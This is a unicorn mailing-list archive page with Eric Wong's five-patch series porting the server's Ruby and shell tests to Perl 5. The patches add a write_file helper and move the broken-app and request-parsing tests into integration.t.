unicorn Ruby/Rack server user+dev discussion/patches/pulls/bugs/help
 help / color / mirror / code / Atom feed
Search results ordered by [date|relevance]  view[summary|nested|Atom feed]
thread overview below | download mbox.gz: |
* [PATCH 0/5..5/5] more tests to Perl 5 for stability
@ 2024-05-06 20:10  1% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2024-05-06 20:10 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 1394 bytes --]

It's far easier to maintain tests in a language that's been
"dead" for 20 years :P  This is another step towards freeing us
up to make more internal changes, too; as well as avoiding slow
Ruby startup overhead.  (Perl 5 startup is slow, too, but not
nearly as slow as Ruby)

Eric Wong (5):
  GNUmakefile: build writes shebang-modified files
  t/*.t: use write_file helper function
  tests: port broken-app test to Perl 5
  tests: move test/unit/test_request.rb to Perl 5
  port test/unit/test_ccc.rb to Perl 5

 GNUmakefile                 |   1 +
 t/active-unix-socket.t      |  13 +--
 t/broken-app.ru             |  13 ---
 t/client_body_buffer_size.t |   5 +-
 t/heartbeat-timeout.t       |   4 +-
 t/integration.ru            |  11 +++
 t/integration.t             | 128 +++++++++++++++++++++++++--
 t/lib.perl                  |   2 +-
 t/reload-bad-config.t       |  17 ++--
 t/reopen-logs.t             |   5 +-
 t/t0009-broken-app.sh       |  56 ------------
 t/winch_ttin.t              |   7 +-
 t/working_directory.t       |  16 +---
 test/unit/test_ccc.rb       |  92 -------------------
 test/unit/test_request.rb   | 170 ------------------------------------
 15 files changed, 153 insertions(+), 387 deletions(-)
 delete mode 100644 t/broken-app.ru
 delete mode 100755 t/t0009-broken-app.sh
 delete mode 100644 test/unit/test_ccc.rb
 delete mode 100644 test/unit/test_request.rb

[-- Attachment #2: 0001-GNUmakefile-build-writes-shebang-modified-files.patch --]
[-- Type: text/x-diff, Size: 772 bytes --]

From 5e9dbfd071aa939677aaf3d269115fb88e606311 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:35 +0000
Subject: [PATCH 1/5] GNUmakefile: build writes shebang-modified files

This makes it easier to run individual integration tests via
prove(1) rather than all at once with gmake(1).
---
 GNUmakefile | 1 +
 1 file changed, 1 insertion(+)

diff --git a/GNUmakefile b/GNUmakefile
index 70e7e10..227842c 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -78,6 +78,7 @@ man1_bins := $(addsuffix .1, $(base_bins))
 man1_paths := $(addprefix man/man1/, $(man1_bins))
 tmp_bins = $(addprefix $(tmp_bin)/, unicorn unicorn_rails)
 pid := $(shell echo $$PPID)
+build: $(tmp_bins)
 
 $(tmp_bin)/%: bin/% | $(tmp_bin)
 	$(INSTALL) -m 755 $< $@.$(pid)

[-- Attachment #3: 0002-t-.t-use-write_file-helper-function.patch --]
[-- Type: text/x-diff, Size: 8088 bytes --]

From 9cbf87fd110acc36c3b6eec14231aed3be78ecf4 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:36 +0000
Subject: [PATCH 2/5] t/*.t: use write_file helper function

This shortens the tests a bit for readability.
---
 t/active-unix-socket.t      | 13 +++----------
 t/client_body_buffer_size.t |  5 ++---
 t/heartbeat-timeout.t       |  4 +---
 t/integration.t             |  5 ++---
 t/reload-bad-config.t       | 17 ++++++-----------
 t/reopen-logs.t             |  5 +----
 t/winch_ttin.t              |  7 ++-----
 t/working_directory.t       | 16 ++++------------
 8 files changed, 21 insertions(+), 51 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index ff731b5..ab3c973 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -11,29 +11,22 @@ END { kill('TERM', values(%to_kill)) if keys %to_kill }
 my $u1 = "$tmpdir/u1.sock";
 my $u2 = "$tmpdir/u2.sock";
 {
-	open my $fh, '>', "$tmpdir/u1.conf.rb";
-	print $fh <<EOM;
+	write_file '>', "$tmpdir/u1.conf.rb", <<EOM;
 pid "$tmpdir/u.pid"
 listen "$u1"
 stderr_path "$err_log"
 EOM
-	close $fh;
-
-	open $fh, '>', "$tmpdir/u2.conf.rb";
-	print $fh <<EOM;
+	write_file '>', "$tmpdir/u2.conf.rb", <<EOM;
 pid "$tmpdir/u.pid"
 listen "$u2"
 stderr_path "$tmpdir/err2.log"
 EOM
-	close $fh;
 
-	open $fh, '>', "$tmpdir/u3.conf.rb";
-	print $fh <<EOM;
+	write_file '>', "$tmpdir/u3.conf.rb", <<EOM;
 pid "$tmpdir/u3.pid"
 listen "$u1"
 stderr_path "$tmpdir/err3.log"
 EOM
-	close $fh;
 }
 
 my @uarg = qw(-D -E none t/integration.ru);
diff --git a/t/client_body_buffer_size.t b/t/client_body_buffer_size.t
index d479901..c8e871d 100644
--- a/t/client_body_buffer_size.t
+++ b/t/client_body_buffer_size.t
@@ -4,11 +4,10 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
-open my $conf_fh, '>', $u_conf;
-$conf_fh->autoflush(1);
-print $conf_fh <<EOM;
+my $conf_fh = write_file '>', $u_conf, <<EOM;
 client_body_buffer_size 0
 EOM
+$conf_fh->autoflush(1);
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my @uarg = (qw(-E none t/client_body_buffer_size.ru -c), $u_conf);
diff --git a/t/heartbeat-timeout.t b/t/heartbeat-timeout.t
index 694867a..0ae0764 100644
--- a/t/heartbeat-timeout.t
+++ b/t/heartbeat-timeout.t
@@ -6,14 +6,12 @@ use autodie;
 use Time::HiRes qw(clock_gettime CLOCK_MONOTONIC);
 mkdir "$tmpdir/alt";
 my $srv = tcp_server();
-open my $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 pid "$tmpdir/pid"
 preload_app true
 stderr_path "$err_log"
 timeout 3 # WORST FEATURE EVER
 EOM
-close $fh;
 
 my $ar = unicorn(qw(-E none t/heartbeat-timeout.ru -c), $u_conf, { 3 => $srv });
 
diff --git a/t/integration.t b/t/integration.t
index d17ace0..93480fa 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -18,13 +18,12 @@ if ('ensure Perl does not set SO_KEEPALIVE by default') {
 	$val = getsockopt($srv, SOL_SOCKET, SO_KEEPALIVE);
 }
 my $t0 = time;
-open my $conf_fh, '>', $u_conf;
-$conf_fh->autoflush(1);
 my $u1 = "$tmpdir/u1";
-print $conf_fh <<EOM;
+my $conf_fh = write_file '>', $u_conf, <<EOM;
 early_hints true
 listen "$u1"
 EOM
+$conf_fh->autoflush(1);
 my $ar = unicorn(qw(-E none t/integration.ru -c), $u_conf, { 3 => $srv });
 my $curl = which('curl');
 local $ENV{NO_PROXY} = '*'; # for curl
diff --git a/t/reload-bad-config.t b/t/reload-bad-config.t
index c023b88..4c17968 100644
--- a/t/reload-bad-config.t
+++ b/t/reload-bad-config.t
@@ -6,32 +6,27 @@ use autodie;
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $ru = "$tmpdir/config.ru";
-my $u_conf = "$tmpdir/u.conf.rb";
 
-open my $fh, '>', $ru;
-print $fh <<'EOM';
+write_file '>', $ru, <<'EOM';
 use Rack::ContentLength
 use Rack::ContentType, 'text/plain'
 config = ru = "hello world\n" # check for config variable conflicts, too
 run lambda { |env| [ 200, {}, [ ru.to_s ] ] }
 EOM
-close $fh;
 
-open $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 preload_app true
 stderr_path "$err_log"
 EOM
-close $fh;
 
 my $ar = unicorn(qw(-E none -c), $u_conf, $ru, { 3 => $srv });
 my ($status, $hdr, $bdy) = do_req($srv, 'GET / HTTP/1.0');
 like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid at start');
 is($bdy, "hello world\n", 'body matches expected');
 
-open $fh, '>>', $ru;
-say $fh '....this better be a syntax error in any version of ruby...';
-close $fh;
+write_file '>>', $ru, <<'EOM';
+....this better be a syntax error in any version of ruby...
+EOM
 
 $ar->do_kill('HUP'); # reload
 my @l;
@@ -42,7 +37,7 @@ for (1..1000) {
 }
 diag slurp($err_log) if $ENV{V};
 ok(grep(/error reloading/, @l), 'got error reloading');
-open $fh, '>', $err_log;
+open my $fh, '>', $err_log; # truncate
 close $fh;
 
 ($status, $hdr, $bdy) = do_req($srv, 'GET / HTTP/1.0');
diff --git a/t/reopen-logs.t b/t/reopen-logs.t
index 76a4dbd..14bc6ef 100644
--- a/t/reopen-logs.t
+++ b/t/reopen-logs.t
@@ -4,14 +4,11 @@
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 my $srv = tcp_server();
-my $u_conf = "$tmpdir/u.conf.rb";
 my $out_log = "$tmpdir/out.log";
-open my $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 stderr_path "$err_log"
 stdout_path "$out_log"
 EOM
-close $fh;
 
 my $auto_reap = unicorn('-c', $u_conf, 't/reopen-logs.ru', { 3 => $srv } );
 my ($status, $hdr, $bdy) = do_req($srv, 'GET / HTTP/1.0');
diff --git a/t/winch_ttin.t b/t/winch_ttin.t
index c507959..3a3d430 100644
--- a/t/winch_ttin.t
+++ b/t/winch_ttin.t
@@ -4,13 +4,11 @@
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 use POSIX qw(mkfifo);
-my $u_conf = "$tmpdir/u.conf.rb";
 my $u_sock = "$tmpdir/u.sock";
 my $fifo = "$tmpdir/fifo";
 mkfifo($fifo, 0666) or die "mkfifo($fifo): $!";
 
-open my $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 pid "$tmpdir/pid"
 listen "$u_sock"
 stderr_path "$err_log"
@@ -19,11 +17,10 @@ after_fork do |server, worker|
   File.open("$fifo", "wb") { |fp| fp.syswrite worker.nr.to_s }
 end
 EOM
-close $fh;
 
 unicorn('-D', '-c', $u_conf, 't/integration.ru')->join;
 is($?, 0, 'daemonized properly');
-open $fh, '<', "$tmpdir/pid";
+open my $fh, '<', "$tmpdir/pid";
 chomp(my $pid = <$fh>);
 ok(kill(0, $pid), 'daemonized PID works');
 my $quit = sub { kill('QUIT', $pid) if $pid; $pid = undef };
diff --git a/t/working_directory.t b/t/working_directory.t
index f9254eb..f1c0a35 100644
--- a/t/working_directory.t
+++ b/t/working_directory.t
@@ -5,15 +5,13 @@ use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 mkdir "$tmpdir/alt";
 my $ru = "$tmpdir/alt/config.ru";
-open my $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 pid "$pid_file"
 preload_app true
 stderr_path "$err_log"
 working_directory "$tmpdir/alt" # the whole point of this test
 before_fork { |_,_| \$master_ppid = Process.ppid }
 EOM
-close $fh;
 
 my $common_ru = <<'EOM';
 use Rack::ContentLength
@@ -21,12 +19,10 @@ use Rack::ContentType, 'text/plain'
 run lambda { |env| [ 200, {}, [ "#{$master_ppid}\n" ] ] }
 EOM
 
-open $fh, '>', $ru;
-print $fh <<EOM;
+write_file '>', $ru, <<EOM;
 #\\--daemonize --listen $u_sock
 $common_ru
 EOM
-close $fh;
 
 unicorn('-c', $u_conf)->join; # will daemonize
 chomp($daemon_pid = slurp($pid_file));
@@ -39,9 +35,7 @@ check_stderr;
 
 if ('test without CLI switches in config.ru') {
 	truncate $err_log, 0;
-	open $fh, '>', $ru;
-	print $fh $common_ru;
-	close $fh;
+	write_file '>', $ru, $common_ru;
 
 	unicorn('-D', '-l', $u_sock, '-c', $u_conf)->join; # will daemonize
 	chomp($daemon_pid = slurp($pid_file));
@@ -68,8 +62,7 @@ if ('ensures broken working_directory (missing config.ru) is OK') {
 if ('fooapp.rb (not config.ru) works with working_directory') {
 	truncate $err_log, 0;
 	my $fooapp = "$tmpdir/alt/fooapp.rb";
-	open $fh, '>', $fooapp;
-	print $fh <<EOM;
+	write_file '>', $fooapp, <<EOM;
 class Fooapp
   def self.call(env)
     b = "dir=#{Dir.pwd}"
@@ -78,7 +71,6 @@ class Fooapp
   end
 end
 EOM
-	close $fh;
 	my $srv = tcp_server;
 	my $auto_reap = unicorn(qw(-c), $u_conf, qw(-I. fooapp.rb),
 				{ -C => '/', 3 => $srv });

[-- Attachment #4: 0003-tests-port-broken-app-test-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 4208 bytes --]

From e61a1152a613032927613b805a46c4d831bad00c Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:37 +0000
Subject: [PATCH 3/5] tests: port broken-app test to Perl 5

Save some inodes and startup time by folding it into the
integration test.
---
 t/broken-app.ru       | 13 ----------
 t/integration.ru      |  1 +
 t/integration.t       | 18 +++++++++++++-
 t/lib.perl            |  2 +-
 t/t0009-broken-app.sh | 56 -------------------------------------------
 5 files changed, 19 insertions(+), 71 deletions(-)
 delete mode 100644 t/broken-app.ru
 delete mode 100755 t/t0009-broken-app.sh

diff --git a/t/broken-app.ru b/t/broken-app.ru
deleted file mode 100644
index 5966bff..0000000
--- a/t/broken-app.ru
+++ /dev/null
@@ -1,13 +0,0 @@
-# frozen_string_literal: false
-# we do not want Rack::Lint or anything to protect us
-use Rack::ContentLength
-use Rack::ContentType, "text/plain"
-map "/" do
-  run lambda { |env| [ 200, {}, [ "OK\n" ] ] }
-end
-map "/raise" do
-  run lambda { |env| raise "BAD" }
-end
-map "/nil" do
-  run lambda { |env| nil }
-end
diff --git a/t/integration.ru b/t/integration.ru
index 6df481c..3a0d99c 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -100,6 +100,7 @@ def rack_input_tests(env)
     when '/early_hints_rack2'; early_hints(env, "r\n2")
     when '/early_hints_rack3'; early_hints(env, %w(r 3))
     when '/broken_app'; raise RuntimeError, 'hello'
+    when '/nil'; nil
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 93480fa..c9a7877 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -122,7 +122,23 @@ check_stderr;
 ($status, $hdr, $bdy) = do_req($srv, 'GET /broken_app HTTP/1.0');
 like($status, qr!\AHTTP/1\.[0-1] 500\b!, 'got 500 error on broken endpoint');
 is($bdy, undef, 'no response body after exception');
-truncate($errfh, 0);
+seek $errfh, 0, SEEK_SET;
+{
+	my $nxt;
+	while (!defined($nxt) && defined($_ = <$errfh>)) {
+		$nxt = <$errfh> if /app error/;
+	}
+	ok $nxt, 'got app error' and
+		like $nxt, qr/\bintegration\.ru/, 'got backtrace';
+}
+seek $errfh, 0, SEEK_SET;
+truncate $errfh, 0;
+
+($status, $hdr, $bdy) = do_req($srv, 'GET /nil HTTP/1.0');
+like($status, qr!\AHTTP/1\.[0-1] 500\b!, 'got 500 error on nil endpoint');
+like slurp($err_log), qr/app error/, 'exception logged for nil';
+seek $errfh, 0, SEEK_SET;
+truncate $errfh, 0;
 
 my $ck_early_hints = sub {
 	my ($note) = @_;
diff --git a/t/lib.perl b/t/lib.perl
index 8c842b1..382f08c 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -30,7 +30,7 @@ $pid_file = "$tmpdir/pid";
 $fifo = "$tmpdir/fifo";
 $u_sock = "$tmpdir/u.sock";
 $u_conf = "$tmpdir/u.conf.rb";
-open($errfh, '>>', $err_log);
+open($errfh, '+>>', $err_log);
 
 if (my $t = $ENV{TAIL}) {
 	my @tail = $t =~ /tail/ ? split(/\s+/, $t) : (qw(tail -F));
diff --git a/t/t0009-broken-app.sh b/t/t0009-broken-app.sh
deleted file mode 100755
index 895b178..0000000
--- a/t/t0009-broken-app.sh
+++ /dev/null
@@ -1,56 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-
-t_plan 9 "graceful handling of broken apps"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	unicorn -E none -D broken-app.ru -c $unicorn_config
-	unicorn_wait_start
-}
-
-t_begin "normal response is alright" && {
-	test xOK = x"$(curl -sSf http://$listen/)"
-}
-
-t_begin "app raised exception" && {
-	curl -sSf http://$listen/raise 2> $tmp || :
-	grep -F 500 $tmp
-	> $tmp
-}
-
-t_begin "app exception logged and backtrace not swallowed" && {
-	grep -F 'app error' $r_err
-	grep -A1 -F 'app error' $r_err | tail -1 | grep broken-app.ru:
-	dbgcat r_err
-	> $r_err
-}
-
-t_begin "trigger bad response" && {
-	curl -sSf http://$listen/nil 2> $tmp || :
-	grep -F 500 $tmp
-	> $tmp
-}
-
-t_begin "app exception logged" && {
-	grep -F 'app error' $r_err
-	> $r_err
-}
-
-t_begin "normal responses alright afterwards" && {
-	> $tmp
-	curl -sSf http://$listen/ >> $tmp &
-	curl -sSf http://$listen/ >> $tmp &
-	curl -sSf http://$listen/ >> $tmp &
-	curl -sSf http://$listen/ >> $tmp &
-	wait
-	test xOK = x$(sort < $tmp | uniq)
-}
-
-t_begin "teardown" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && check_stderr
-
-t_done

[-- Attachment #5: 0004-tests-move-test-unit-test_request.rb-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 11298 bytes --]

From 01224642a20e91de5ea18c6f20856142158068a8 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:38 +0000
Subject: [PATCH 4/5] tests: move test/unit/test_request.rb to Perl 5

Another step towards having more freedom to change our internals
and having a more stable language for tests to reduce
maintenance overhead by avoiding Ruby incompatibilities.
---
 t/integration.ru          |   6 ++
 t/integration.t           |  72 +++++++++++++++-
 test/unit/test_request.rb | 170 --------------------------------------
 3 files changed, 75 insertions(+), 173 deletions(-)
 delete mode 100644 test/unit/test_request.rb

diff --git a/t/integration.ru b/t/integration.ru
index 3a0d99c..a6b022a 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -47,6 +47,7 @@ def env_dump(env)
     else
       case k
       when 'rack.version', 'rack.after_reply'; h[k] = v
+      when 'rack.input'; h[k] = v.class.to_s
       end
     end
   end
@@ -112,6 +113,11 @@ def rack_input_tests(env)
   when 'PUT'
     case env['PATH_INFO']
     when %r{\A/rack_input}; rack_input_tests(env)
+    when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
+    end
+  when 'OPTIONS'
+    case env['REQUEST_URI']
+    when '*'; [ 200, {}, [ env_dump(env) ] ]
     end
   end # case REQUEST_METHOD
 end) # run
diff --git a/t/integration.t b/t/integration.t
index c9a7877..3b1d6df 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -103,14 +103,75 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 
 SKIP: {
 	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
-	($status, $hdr, my $json) = do_req $srv, 'GET /env_dump';
+	my $get_json = sub {
+		my (@req) = @_;
+		my @r = do_req $srv, @req;
+		my $env = eval { JSON::PP->new->decode($r[2]) };
+		diag "$@ (r[2]=$r[2])" if $@;
+		is ref($env), 'HASH', "@req response body is JSON";
+		(@r, $env)
+	};
+	($status, $hdr, my $json, my $env) = $get_json->('GET /env_dump');
 	is($status, undef, 'no status for HTTP/0.9');
 	is($hdr, undef, 'no header for HTTP/0.9');
 	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
 	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
-	my $env = JSON::PP->new->decode($json);
-	is(ref($env), 'HASH', 'JSON decoded body to hashref');
 	is($env->{SERVER_PROTOCOL}, 'HTTP/0.9', 'SERVER_PROTOCOL is 0.9');
+	is $env->{'rack.url_scheme'}, 'http', 'rack.url_scheme default';
+	is $env->{'rack.input'}, 'StringIO', 'StringIO for no content';
+
+	my $req = 'OPTIONS *';
+	($status, $hdr, $json, $env) = $get_json->("$req HTTP/1.0");
+	is $env->{REQUEST_PATH}, '', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '', "$req => PATH_INFO";
+	is $env->{REQUEST_URI}, '*', "$req => REQUEST_URI";
+
+	$req = 'GET http://e:3/env_dump?y=z';
+	($status, $hdr, $json, $env) = $get_json->("$req HTTP/1.0");
+	is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+	is $env->{QUERY_STRING}, 'y=z', "$req => QUERY_STRING";
+
+	$req = 'GET http://e:3/env_dump#frag';
+	($status, $hdr, $json, $env) = $get_json->("$req HTTP/1.0");
+	is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+	is $env->{QUERY_STRING}, '', "$req => QUERY_STRING";
+	is $env->{FRAGMENT}, 'frag', "$req => FRAGMENT";
+
+	$req = 'GET http://e:3/env_dump?a=b#frag';
+	($status, $hdr, $json, $env) = $get_json->("$req HTTP/1.0");
+	is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+	is $env->{QUERY_STRING}, 'a=b', "$req => QUERY_STRING";
+	is $env->{FRAGMENT}, 'frag', "$req => FRAGMENT";
+
+	for my $proto (qw(https http)) {
+		$req = "X-Forwarded-Proto: $proto";
+		($status, $hdr, $json, $env) = $get_json->(
+						"GET /env_dump HTTP/1.0\r\n".
+						"X-Forwarded-Proto: $proto");
+		is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+		is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+		is $env->{'rack.url_scheme'}, $proto, "$req => rack.url_scheme";
+	}
+
+	$req = 'X-Forwarded-Proto: ftp'; # invalid proto
+	($status, $hdr, $json, $env) = $get_json->(
+					"GET /env_dump HTTP/1.0\r\n".
+					"X-Forwarded-Proto: ftp");
+	is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+	is $env->{'rack.url_scheme'}, 'http', "$req => rack.url_scheme";
+
+	($status, $hdr, $json, $env) = $get_json->("PUT /env_dump HTTP/1.0\r\n".
+						'Content-Length: 0');
+	is $env->{'rack.input'}, 'StringIO', 'content-length: 0 uses StringIO';
+
+	($status, $hdr, $json, $env) = $get_json->("PUT /env_dump HTTP/1.0\r\n".
+						'Content-Length: 1');
+	is $env->{'rack.input'}, 'Unicorn::TeeInput',
+		'content-length: 1 uses TeeInput';
 }
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
@@ -179,6 +240,11 @@ if ('bad requests') {
 	($status, $hdr) = do_req $srv, 'GET /env_dump HTTP/1/1';
 	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
 
+	for my $abs_uri (qw(ssh+http://e/ ftp://e/x http+ssh://e/x)) {
+		($status, $hdr) = do_req $srv, "GET $abs_uri HTTP/1.0";
+		like $status, qr!\AHTTP/1\.[01] 400 \b!, "400 on $abs_uri";
+	}
+
 	$c = tcp_start($srv);
 	print $c 'GET /';
 	my $buf = join('', (0..9), 'ab');
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
deleted file mode 100644
index 9d1b350..0000000
--- a/test/unit/test_request.rb
+++ /dev/null
@@ -1,170 +0,0 @@
-# -*- encoding: binary -*-
-# frozen_string_literal: false
-
-# Copyright (c) 2009 Eric Wong
-# You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv2+ (GPLv3+ preferred)
-
-require './test/test_helper'
-
-include Unicorn
-
-class RequestTest < Test::Unit::TestCase
-
-  MockRequest = Class.new(StringIO)
-
-  AI = Addrinfo.new(Socket.sockaddr_un('/unicorn/sucks'))
-
-  def setup
-    @request = HttpRequest.new
-    @app = lambda do |env|
-      [ 200, { 'content-length' => '0', 'content-type' => 'text/plain' }, [] ]
-    end
-    @lint = Rack::Lint.new(@app)
-  end
-
-  def test_options
-    client = MockRequest.new("OPTIONS * HTTP/1.1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal '', env['REQUEST_PATH']
-    assert_equal '', env['PATH_INFO']
-    assert_equal '*', env['REQUEST_URI']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_absolute_uri_with_query
-    client = MockRequest.new("GET http://e:3/x?y=z HTTP/1.1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal '/x', env['REQUEST_PATH']
-    assert_equal '/x', env['PATH_INFO']
-    assert_equal 'y=z', env['QUERY_STRING']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_absolute_uri_with_fragment
-    client = MockRequest.new("GET http://e:3/x#frag HTTP/1.1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal '/x', env['REQUEST_PATH']
-    assert_equal '/x', env['PATH_INFO']
-    assert_equal '', env['QUERY_STRING']
-    assert_equal 'frag', env['FRAGMENT']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_absolute_uri_with_query_and_fragment
-    client = MockRequest.new("GET http://e:3/x?a=b#frag HTTP/1.1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal '/x', env['REQUEST_PATH']
-    assert_equal '/x', env['PATH_INFO']
-    assert_equal 'a=b', env['QUERY_STRING']
-    assert_equal 'frag', env['FRAGMENT']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_absolute_uri_unsupported_schemes
-    %w(ssh+http://e/ ftp://e/x http+ssh://e/x).each do |abs_uri|
-      client = MockRequest.new("GET #{abs_uri} HTTP/1.1\r\n" \
-                               "Host: foo\r\n\r\n")
-      assert_raises(HttpParserError) { @request.read_headers(client, AI) }
-    end
-  end
-
-  def test_x_forwarded_proto_https
-    client = MockRequest.new("GET / HTTP/1.1\r\n" \
-                             "X-Forwarded-Proto: https\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal "https", env['rack.url_scheme']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_x_forwarded_proto_http
-    client = MockRequest.new("GET / HTTP/1.1\r\n" \
-                             "X-Forwarded-Proto: http\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal "http", env['rack.url_scheme']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_x_forwarded_proto_invalid
-    client = MockRequest.new("GET / HTTP/1.1\r\n" \
-                             "X-Forwarded-Proto: ftp\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal "http", env['rack.url_scheme']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_rack_lint_get
-    client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal "http", env['rack.url_scheme']
-    assert_equal '127.0.0.1', env['REMOTE_ADDR']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_no_content_stringio
-    client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal StringIO, env['rack.input'].class
-  end
-
-  def test_zero_content_stringio
-    client = MockRequest.new("PUT / HTTP/1.1\r\n" \
-                             "Content-Length: 0\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal StringIO, env['rack.input'].class
-  end
-
-  def test_real_content_not_stringio
-    client = MockRequest.new("PUT / HTTP/1.1\r\n" \
-                             "Content-Length: 1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal Unicorn::TeeInput, env['rack.input'].class
-  end
-
-  def test_rack_lint_put
-    client = MockRequest.new(
-      "PUT / HTTP/1.1\r\n" \
-      "Host: foo\r\n" \
-      "Content-Length: 5\r\n" \
-      "\r\n" \
-      "abcde")
-    env = @request.read_headers(client, AI)
-    assert ! env.include?(:http_body)
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_rack_lint_big_put
-    count = 100
-    bs = 0x10000
-    buf = (' ' * bs).freeze
-    length = bs * count
-    client = Tempfile.new('big_put')
-    client.syswrite(
-      "PUT / HTTP/1.1\r\n" \
-      "Host: foo\r\n" \
-      "Content-Length: #{length}\r\n" \
-      "\r\n")
-    count.times { assert_equal bs, client.syswrite(buf) }
-    assert_equal 0, client.sysseek(0)
-    env = @request.read_headers(client, AI)
-    assert ! env.include?(:http_body)
-    assert_equal length, env['rack.input'].size
-    count.times {
-      tmp = env['rack.input'].read(bs)
-      tmp << env['rack.input'].read(bs - tmp.size) if tmp.size != bs
-      assert_equal buf, tmp
-    }
-    assert_nil env['rack.input'].read(bs)
-    env['rack.input'].rewind
-    assert_kind_of Array, @lint.call(env)
-  end
-end

[-- Attachment #6: 0005-port-test-unit-test_ccc.rb-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 6013 bytes --]

From d6d127f50f9225bf51ef6ce0abce9bad87efaae3 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:39 +0000
Subject: [PATCH 5/5] port test/unit/test_ccc.rb to Perl 5

We'll fold this into integration.t to reduce startup time
penalties and get the benefit of a stable language to reduce
maintenance overhead.
---
 t/integration.ru      |  4 ++
 t/integration.t       | 33 ++++++++++++++++
 test/unit/test_ccc.rb | 92 -------------------------------------------
 3 files changed, 37 insertions(+), 92 deletions(-)
 delete mode 100644 test/unit/test_ccc.rb

